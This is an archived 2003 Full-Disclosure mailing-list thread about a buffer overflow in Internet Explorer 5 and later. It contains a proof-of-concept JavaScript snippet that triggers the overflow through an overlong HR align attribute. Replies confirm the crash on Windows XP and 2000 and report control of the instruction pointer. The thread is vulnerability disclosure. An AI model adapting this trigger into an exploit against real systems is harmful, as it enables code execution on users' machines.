[Full-Disclosure] Re: Internet Explorer >=5.0 : Buffer overflow
From: SecurITeam BugTraq Monitoring (bugtraq_at_securiteam.com)
Date: 06/25/03
- Previous message: SecuriTeam: "[UNIX] Gnome Batalla Naval Remotely Exploitable Buffer Overflow (Exploit)"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
To: "KF" <dotslash@snosoft.com>, "Digital Scream" <digitalscream@real.xakep.ru> Date: Wed, 25 Jun 2003 13:05:20 +0200
Hi,
I can confirm it under Windows 2000 with IE 5.50.4807.2300
Full control over the EIP, but the shellcode cannot contain (as it currently
appears) non Alpha Numeric characters, too bad I guess.
Thanks
Noam Rathaus
CTO
Beyond Security Ltd
http://www.SecurITeam.com
http://www.BeyondSecurity.com
----- Original Message -----
From: "KF" <dotslash@snosoft.com>
To: "Digital Scream" <digitalscream@real.xakep.ru>
Sent: Monday, June 23, 2003 6:43 PM
Subject: Re: Internet Explorer >=5.0 : Buffer overflow
> I can confirm this on Windows XP Professional
>
> version 6.0.2800.1106.xpsp2-030422-1633
>
> 0x43534c41 refrenced mem at 0x43534c41
> -KF
>
>
> Digital Scream wrote:
>
> ><script>
> > wnd=open("about:blank","","");
> > wnd.moveTo(screen.Width,screen.Height);
> > WndDoc=wnd.document;
> > WndDoc.open();
> > WndDoc.clear();
> > buffer="";
> > for(i=1;i<=127;i++)buffer+="X";
> > buffer+="DigitalScream";
> > WndDoc.write("<HR align='"+buffer+"'>");
> > WndDoc.execCommand("SelectAll");
> > WndDoc.execCommand("Copy");
> > wnd.close();
> ></script>
> >
> >Grtz: Nj3l, buggzy, 3APA3A, Void Team, X - Crew
> >
> >
> >
>
>
>
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html
- Previous message: SecuriTeam: "[UNIX] Gnome Batalla Naval Remotely Exploitable Buffer Overflow (Exploit)"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
Relevant Pages
|
